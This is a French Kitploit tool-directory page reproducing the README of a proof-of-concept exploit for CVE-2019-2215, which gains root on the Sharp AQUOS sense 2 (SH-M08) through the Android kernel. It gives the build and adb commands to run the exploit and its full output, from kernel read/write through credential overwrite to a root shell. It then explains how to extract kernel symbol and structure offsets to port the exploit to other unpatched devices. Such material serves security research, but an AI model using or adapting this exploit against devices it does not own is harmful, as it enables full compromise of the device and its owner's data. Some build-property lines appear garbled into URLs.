Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2019-2215_SH-M08 — Exploit de preuve de concept pour CVE-2019-2215 ciblant le noyau Android afin d'obtenir une élévation de privilèges root sur AQUOS sense 2 (SH-M08). Inclut la lecture/écriture du noyau et le lancement d'un shell. | Kitploit
Outils/GitHubGitHub/mouseos/cve-2019-2215_sh-m08
Sécurité AndroidEscalade de PrivilègesExploitationDéveloppement de Charges UtilesExploitation de Binaires
GitHubmouseos/cve-2019-2215_sh-m08

cve-2019-2215_SH-M08

Exploit de preuve de concept pour CVE-2019-2215 ciblant le noyau Android afin d'obtenir une élévation de privilèges root sur AQUOS sense 2 (SH-M08). Inclut la lecture/écriture du noyau et le lancement d'un shell.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
211il y a 1 anPas encore vérifié

Version portée sur AQUOS sense 2 (SH-M08) d'un code de preuve de concept (POC) permettant d'obtenir les privilèges root sur les terminaux Android ayant reçu des correctifs de sécurité antérieurs à octobre 2019.

Environnement d'exécution

Le fonctionnement a été vérifié avec les versions d'OS suivantes. Pour exécuter sur d'autres versions ou d'autres modèles, reportez-vous au chapitre « Méthode de portage ».

root@kitploit:~
[ro.build.date]: [2019年  3月 20日 水曜日 04:58:03 JST]
[ro.build.description]: [Anasui-user 8.1.0 S3200 01.00.02 release-keys]
[ro.build.display.id]: https://raw.githubusercontent.com/mouseos/cve-2019-2215_sh-m08/main/%5B01.00.02%5D
[ro.build.fingerprint]: https://raw.githubusercontent.com/mouseos/cve-2019-2215_sh-m08/main/%5BSHARP/SH-M08/SH-M08:8.1.0/S3200/01.00.02:user/release-keys%5D
[ro.build.id]: https://raw.githubusercontent.com/mouseos/cve-2019-2215_sh-m08/main/%5BS3200%5D
[ro.build.product]: https://raw.githubusercontent.com/mouseos/cve-2019-2215_sh-m08/main/%5BAnasui%5D

Méthode de compilation

aarch64-linux-android21-clang -pie poc.c -o poc

Méthode pour obtenir un root temporaire

root@kitploit:~
$ adb push poc /data/local/tmp
$ adb shell

SH-M08:/ $ /data/local/tmp/poc shell
CHILD: Doing EPOLL_CTL_DEL.
CHILD: Finished EPOLL_CTL_DEL.
CHILD: Finished write to FIFO.
writev() returns 0x2000
PARENT: Finished calling READV
current_ptr == 0xffffffc0617bb800
CHILD: Doing EPOLL_CTL_DEL.
CHILD: Finished EPOLL_CTL_DEL.
recvmsg() returns 49, expected 49
should have stable kernel R/W now :)
current->mm == 0xffffffc0a8e1f840
current->mm->user_ns == 0xffffff8009e225d8
kernel base is 0xffffff8008280000
&init_task == 0xffffff8009e16000
init_task.cred == 0xffffff8009e23dd0
init->cred
00000000  04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000010  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000030  ff ff ff ff 3f 00 00 00 ff ff ff ff 3f 00 00 00  |....?.......?...|
00000040  ff ff ff ff 3f 00 00 00 00 00 00 00 00 00 00 00  |....?...........|
00000050  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000060  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000070  00 00 00 00 00 00 00 00 80 35 3e 5a c0 ff ff ff  |.........5>Z....|
00000080  70 25 e2 09 80 ff ff ff d8 25 e2 09 80 ff ff ff  |p%.......%......|
00000090  78 3e e2 09 80 ff ff ff 00 00 00 00 00 00 00 00  |x>..............|
000000a0  00 00 00 00 00 00 00 00 a7 01 00 00 00 00 00 00  |................|
000000b0  e0 ff ff ff 0f 00 00 00 88 3e e2 09 80 ff ff ff  |.........>......|
000000c0  88 3e e2 09 80 ff ff ff 84 c9 0c 08 80 ff ff ff  |.>..............|
current->cred == 0xffffffc0a9b549c0
Starting as uid 2000
current->cred
00000000  19 00 00 00 d0 07 00 00 d0 07 00 00 d0 07 00 00  |................|
00000010  d0 07 00 00 d0 07 00 00 d0 07 00 00 d0 07 00 00  |................|
00000020  d0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000030  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000040  c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000050  00 00 00 00 00 00 00 00 00 af 0f aa c0 ff ff ff  |................|
00000060  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000070  00 00 00 00 00 00 00 00 00 91 bf 36 c0 ff ff ff  |...........6....|
00000080  80 ce db a4 c0 ff ff ff d8 25 e2 09 80 ff ff ff  |.........%......|
00000090  80 14 f8 a4 c0 ff ff ff 00 00 00 00 00 00 00 00  |................|
000000a0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
000000b0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
000000c0  c0 40 b5 a9 c0 ff ff ff 00 00 00 00 00 00 00 00  |.@..............|
00000000  00 00 00 00 00 00 00 00 fe ff ff ff ff ff ff ff  |................|
00000010  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
init->security_cred
00000000  01 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00  |................|
00000010  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
current->security_cred
00000000  ee 03 00 00 ee 03 00 00 00 00 00 00 00 00 00 00  |................|
00000010  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
Escalating...
UIDs changed to root!
Capabilities set to ALL
SELinux status = 0
SELinux is already in permissive mode
Re-joining the init mount namespace...
Re-joining the init net namespace...
SECCOMP is already disabled!
------------------
00000000  1b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000010  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000030  ff ff ff ff 3f 00 00 00 ff ff ff ff 3f 00 00 00  |....?.......?...|
00000040  ff ff ff ff 3f 00 00 00 00 00 00 00 00 00 00 00  |....?...........|
00000050  00 00 00 00 00 00 00 00 00 af 0f aa c0 ff ff ff  |................|
00000060  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000070  00 00 00 00 00 00 00 00 00 91 bf 36 c0 ff ff ff  |...........6....|
00000080  80 ce db a4 c0 ff ff ff d8 25 e2 09 80 ff ff ff  |.........%......|
00000090  80 14 f8 a4 c0 ff ff ff 00 00 00 00 00 00 00 00  |................|
000000a0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
000000b0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
000000c0  c0 40 b5 a9 c0 ff ff ff 00 00 00 00 00 00 00 00  |.@..............|
Spawning shell!
SH-M08:/ #

Méthode de portage

Obtenir le binaire du noyau

Récupérez le noyau en cours d'exécution sur le terminal. Voici deux méthodes :

  1. Extraire de l'OTA Si boot.img ou recovery.img sont présents dans la mise à jour OTA, extrayez‑les de là. Assurez‑vous que ces fichiers correspondent à la version actuellement utilisée. Il est également possible d'extraire les OTA Google à l'aide de l'outil suivant : https://github.com/mouseos/android-checkin-py.git Depuis boot.img, vous pouvez extraire zImage avec abootimg. zImage peut être converti en vmlinux avec extract-vmlinux.

  2. Compiler le noyau Compilez les sources du noyau publiées officiellement par le constructeur. Utilisez exactement le même defconfig que celui du périphérique actuel. Dans la mesure du possible, ne modifiez pas le code lors de la compilation. Une fois la compilation terminée, vmlinux devrait être créé.

Extraire les offsets nécessaires

  1. Commencez par rechercher les offsets suivants avec la commande nm :
root@kitploit:~
$ nm -n ./vmlinux | grep ' _head$'
ffffff8008080000 t _head
$ nm -n ./vmlinux | grep ' init_user_ns$'
ffffff8009c225d8 D init_user_ns
$ nm -n ./vmlinux | grep ' init_task$'
ffffff8009c16000 D init_task
$ nm -n ./vmlinux | grep ' init_uts_ns$'
ffffff8009c15dc0 D init_uts_ns
$ nm -n ./vmlinux | grep ' selinux_enforcing$'
ffffff8009de2000 D selinux_enforcing
  1. Calculez les constantes avec la formule suivante : {valeur de chaque offset} - {valeur de _head} Par exemple, avec les valeurs ci‑dessus, les constantes seraient :
root@kitploit:~
#define SYMBOL__init_user_ns 0x1BA25D8
#define SYMBOL__init_task 0x1B96000
#define SYMBOL__init_uts_ns 0x1B95DC0

#define SYMBOL__selinux_enforcing 0x1D62000
  1. Ensuite, recherchez les offsets des structures avec la commande pahole :
root@kitploit:~
$ pahole -C task_struct vmlinux | grep -E ' mm;'
        struct mm_struct *         mm;                   /*  1336     8 */

1336 en hexadécimal donne 0x538

Donc #define OFFSET__task_struct__mm 0x538

root@kitploit:~
$ pahole -C task_struct vmlinux | grep -E ' cred;'
        const struct cred  *       cred;                 /*  1944     8 */

1944 en hexadécimal donne 0x798

Donc #define OFFSET__task_struct__cred 0x798

root@kitploit:~
$ pahole -C mm_struct vmlinux | grep ' user_ns;'
        struct user_namespace *    user_ns;              /*   752     8 */

752 en hexadécimal donne 0x2f0

Donc #define OFFSET__mm_struct__user_ns 0x2F0

Dépannage

pahole: file 'vmlinux' has no supported type information.

root@kitploit:~
$ pahole vmlinux
libbpf: failed to find '.BTF' ELF section in vmlinux
pahole: file 'vmlinux' has no supported type information.

Le fichier vmlinux ne contient pas les informations nécessaires à l'analyse par pahole. Si c'est le cas, l'analyse est impossible ; utilisez alors le noyau que vous avez compilé vous‑même à partir des sources publiées par le constructeur.

Le terminal plante

Un des offsets est incorrect.

Ne fonctionne pas

Le code ne fonctionne pas sur les OS dont le correctif de sécurité est d'octobre 2019 ou ultérieur.

Informations de copyright

qu1ckr00t

Ce code est développé à partir du POC créé par Grant H. https://github.com/grant-h/qu1ckr00t

Télécharger l’outil
Nom de la constanteValeur d'offsetValeur offset - _head
SYMBOL__init_user_ns0xffffff8009c225d80x1BA25D8
SYMBOL__init_task0xffffff8009c160000x1B96000
SYMBOL__init_uts_ns0xffffff8009c15dc00x1B95DC0
SYMBOL__selinux_enforcing0xffffff8009de20000x1D62000